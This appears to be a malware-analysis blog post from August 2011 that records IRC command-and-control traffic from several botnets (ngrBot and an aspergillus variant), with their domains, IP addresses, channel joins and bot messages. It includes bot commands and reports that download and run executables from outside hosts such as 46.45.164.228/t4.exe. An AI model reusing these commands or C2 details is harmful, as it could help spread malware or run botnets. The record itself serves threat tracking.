Month: August 2011

www.facebookvideocentral.com (irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)


Resolved : [www.facebookvideocentral.com] To [46.45.164.229]

Remote Host Port Number
46.45.164.229 80

NICK 0USAicqigqz
JOIN #unk2 ….
USER yztwfqz * 0 :yztwfqz
MODE 0USAicqigqz -ix

Now talking in #unk2
Topic On: [ #unk2 ] [ ]
Topic By: [ j ]
Now talking in #unk3
Topic On: [ #unk3 ] [ .down http://46.45.164.228/t4.exe c:48o9o8k8s3i8.exe.exe 1 ]

juegalon.com (ngrBot hosted in Seychelles Ideal Solution Ltd)


Resolved : [juegalon.com] To [193.107.16.75]

Remote Host Port Number
173.208.131.234 80
199.15.234.7 80
65.60.49.28 80
193.107.16.75 1863

PASS ngrBot
NICK n{US|XPa}knloiig
USER knloiig 0 0 :knloiig
JOIN #rjr RjR
PRIVMSG #rjr :[DNS]: Blocked 0 domain(s) - Redirected 8 domain(s)
PRIVMSG #rjr :[d="http://173.208.131.234/~dalepapi/ngr18.exe" s="158208 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Gcxaxg.exe" - Download retries: 0

kkk.hi5fotos.info (aspergillus mod hosted in Taiwan Taoyuan Taoyuan County Education Network Center)


Resolved : [kkk.hi5fotos.info] To [163.30.129.25]
Resolved : [kkk.hi5fotos.info] To [83.169.40.209]
Resolved : [kkk.hi5fotos.info] To [58.19.130.52]

Remote Host Port Number
163.30.129.25 4042
195.122.131.8 80
89.200.143.50 80

NICK new[USA|XP|COMPUTERNAME]pdnhwod
USER hh "" "lol" :hh
JOIN #biznew#
PONG 422
PRIVMSG #boss :[d="http://goo.gl/kg5QG"] Error downloading file [e="12039"]
NICK n{US|XPa}cgveoja
USER cgveoja 0 0 :cgveoja
JOIN #boss ngrBot
JOIN #US

219.148.138.84 (ngrBot hosted in China Hebei Chinanet Hebei Province Network)


Resolved : [herbal-roidz.com] To [219.148.138.84]

Remote Host Port Number
199.15.234.7 80
70.38.98.236 80
70.38.98.239 80
219.148.138.84 5101

PASS hax0r
PRIVMSG #ngme :[d="http://img105.herosh.com/2011/07/09/982279045.gif" s="19432 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0

* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://img102.herosh.com/2011/07/09/166578640.gif
o